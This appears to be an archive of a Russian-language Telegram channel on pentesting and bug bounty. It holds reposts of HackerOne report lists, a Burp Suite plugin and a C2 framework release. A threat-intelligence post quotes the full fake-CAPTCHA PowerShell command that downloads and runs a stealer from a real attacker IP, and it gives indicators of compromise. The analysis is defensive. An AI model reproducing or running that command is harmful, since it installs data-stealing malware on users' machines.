uz
Feedback
Fsecurity | HH

Fsecurity | HH

Kanalga Telegram’da o‘tish

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Ko'proq ko'rsatish
2 064
Obunachilar
-224 soatlar
-97 kun
+330 kun
Postlar arxiv
Repost from Social Engineering
📝 HackerOne reports. • Держите ссылки на очень объемный и полезный репозиторий, который включает в себя топ отчеты HackerOne
📝 HackerOne reports. • Держите ссылки на очень объемный и полезный репозиторий, который включает в себя топ отчеты HackerOne. Репо постоянно поддерживают в актуальном состоянии, что поможет вам узнать много нового и полезного (варианты эксплуатации различных уязвимостей, векторы атак и т.д.). • Tops 100: ➡Top 100 upvoted reports; ➡Top 100 paid reports. • Tops by bug type: ➡Top XSS reports; ➡Top XXE reports; ➡Top CSRF reports; ➡Top IDOR reports; ➡Top RCE reports; ➡Top SQLi reports; ➡Top SSRF reports; ➡Top Race Condition reports; ➡Top Subdomain Takeover reports; ➡Top Open Redirect reports; ➡Top Clickjacking reports; ➡Top DoS reports; ➡Top OAuth reports; ➡Top Account Takeover reports; ➡Top Business Logic reports; ➡Top REST API reports; ➡Top GraphQL reports; ➡Top Information Disclosure reports; ➡Top Web Cache reports; ➡Top SSTI reports; ➡Top Upload reports; ➡Top HTTP Request Smuggling reports; ➡Top OpenID reports; ➡Top Mobile reports; ➡Top File Reading reports; ➡Top Authorization Bypass reports; ➡Top Authentication Bypass reports; ➡Top MFA reports. • Tops by program: ➡Top Mail.ru reports; ➡Top HackerOne reports; ➡Top Shopify reports; ➡Top Nextcloud reports; ➡Top Twitter reports; ➡Top X (formerly Twitter) reports; ➡Top Uber reports; ➡Top Node.js reports; ➡Top shopify-scripts reports; ➡Top Legal Robot reports; ➡Top U.S. Dept of Defense reports; ➡Top Gratipay reports; ➡Top Weblate reports; ➡Top VK.com reports; ➡Top New Relic reports; ➡Top LocalTapiola reports; ➡Top Zomato reports; ➡Top Slack reports; ➡Top ownCloud reports; ➡Top GitLab reports; ➡Top Ubiquiti Inc. reports; ➡Top Automattic reports; ➡Top Coinbase reports; ➡Top Verizon Media reports; ➡Top Starbucks reports; ➡Top Paragon Initiative Enterprises reports; ➡Top PHP (IBB) reports; ➡Top Brave Software reports; ➡Top Vimeo reports; ➡Top OLX reports; ➡Top concrete5 reports; ➡Top Phabricator reports; ➡Top Localize reports; ➡Top Qiwi reports. S.E. ▪️ infosec.work ▪️ VT

Все на нашем Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

#Статья Как найти свой первый легкий баг в Bug Bounty (Пошаговое руководство) на реальных сайтах 👉 В статье разобраны простые шаги для новичков в Bug Bounty, включая выбор правильной цели, поиск уязвимостей на React-сайтах, тестирование OTP Rate-limiting и утечек приватных ключей, чтобы быстро найти свой первый баг. ⏱️ Время чтения: 5 минут

sticker.webp0.26 KB

Огромное спасибо! 🥳 Это значительная цифра для меня, и я очень рад, что мы этого достигли! Спасибо каждому за вклад как в Yo
Огромное спасибо! 🥳 Это значительная цифра для меня, и я очень рад, что мы этого достигли! Спасибо каждому за вклад как в YouTube, так и в наше сообщество в Discord, а также за участие в Telegram-канале!

Repost from haxx
🛠 Всем привет. Я тут допилил плагин CSP Recon для Burp Suite для рекона по Content-Security-Policy хэдерам. Общая идея этого
+2
🛠 Всем привет. Я тут допилил плагин CSP Recon для Burp Suite для рекона по Content-Security-Policy хэдерам. Общая идея этого вида рекона в том, что в хэдерах Content-Security-Policy можно найти дополнительные домены/поддомены по исследуемому нами таргету. Зачастую это будут скучные интеграции (например разного рода аналитика, соцсети, видеохостинги), но иногда попадается что-то интересное. Для работы "по площадям" можно воспользоваться консольной csprecon (тут писали), но это не сработает вглубь приложения. Смысл в том, что у больших и склеенных из разных кусков приложений в разных частях бывают разные CSP полиси. Например, возьмем Яндекс. По пути / мы получаем одну полиси, а по пути /portal/set/any совсем другую. Так можно находить места склейки приложений и потенциально новые домены. Теперь это безобразие можно детектить в фоне, пока тыкаешь кнопки и кавычки. 🔗 Где исходники, Билли? https://github.com/haxxm0nkey/csprecon-burp-extension

Repost from Adaptix Framework
AdaptixC2 v0.2 is out * Socks4/5 * Local/Reverse Port forwardin * MultiProjects * Light GUI And more in the changelog
AdaptixC2 v0.2 is out * Socks4/5 * Local/Reverse Port forwardin * MultiProjects * Light GUI And more in the changelog

Все на нашем Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from ESCalator
Радиолюбителям приготовиться 📻 Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. Сайт сущес
+3
Радиолюбителям приготовиться 📻 Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. Сайт существует с 2017 года и стабильно входит в число первых результатов поиска в Яндексе. При входе на сайт пользователю сразу же предлагается пройти проверку и доказать, что он не робот. Однако вместо привычного набора задач при клике на кнопку «Я не робот» запускается JavaScript-функция. Она не выполняет проверку, а копирует заранее подготовленный текст в буфер обмена (скриншот 1). Пользователю предлагается следовать инструкциям: открыть окно «Выполнить» (Win+R) и нажать Ctrl+V, чтобы вставить скопированный текст. При этом в буфер попадает команда:
PowerShell.exe -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1') # 'I am not a robot - reCAPTCHA ID: 477237535673 TRUE'"
Из-за ограниченного размера окна «Выполнить» отображается лишь последняя ее часть (скриншот 2):
I am not a robot - reCAPTCHA ID: 477237535673 TRUE
Это позволяет скрыть от глаз невнимательного пользователя факт выполнения вредоносного кода. Команда запускает PowerShell в скрытом режиме, отключая проверки безопасности, скачивает удаленный ps1-скрипт по указанному URL и сразу его выполняет. Ранее о подобных способах распространения ВПО писали наши коллеги. А недавно схожий инцидент зафиксировал наш SOC (но об этом — в следующих постах). 📸 Скрипт представляет собой примитивный стилер. Вредоносный инструмент скачивается в систему и выполняется для извлечения данных (в числе которых — имя компьютера и пользователя, сведения об операционной системе, процессоре, дисках, а также внутренние и внешние IP-адреса), файлов (документов, таблиц, презентаций, текстовых материалов и изображений, найденных на рабочем столе и в папке «Загрузки»), а также для создания 300 скриншотов экрана с интервалом в 30 секунд. Кроме того, в скрипте присутствуют комментарии на русском языке (скриншот 3). После сбора информации формируется команда curl, которая посредством POST-запроса HTTP отправляет данные на сервер злоумышленников с адресом http://45.61.157.179/upload. Скрипт взаимодействует с IP-адресом 45.61.157.179 (AS 14956, ROUTERHOSTING, США), где размещен домен eschool-ua.online. На этом сайте находится форма для входа в сервис DrobBox, предположительно функционирующий как командный центр злоумышленников (скриншот 4). На момент написания поста домен уже недоступен. IoCs
45.61.157.179
eschool-ua.online
4bdaa2e9bc6c6986981d039b29085683ed36b5c2549466101a81ad660281465c
#TI #ioc @ptescalator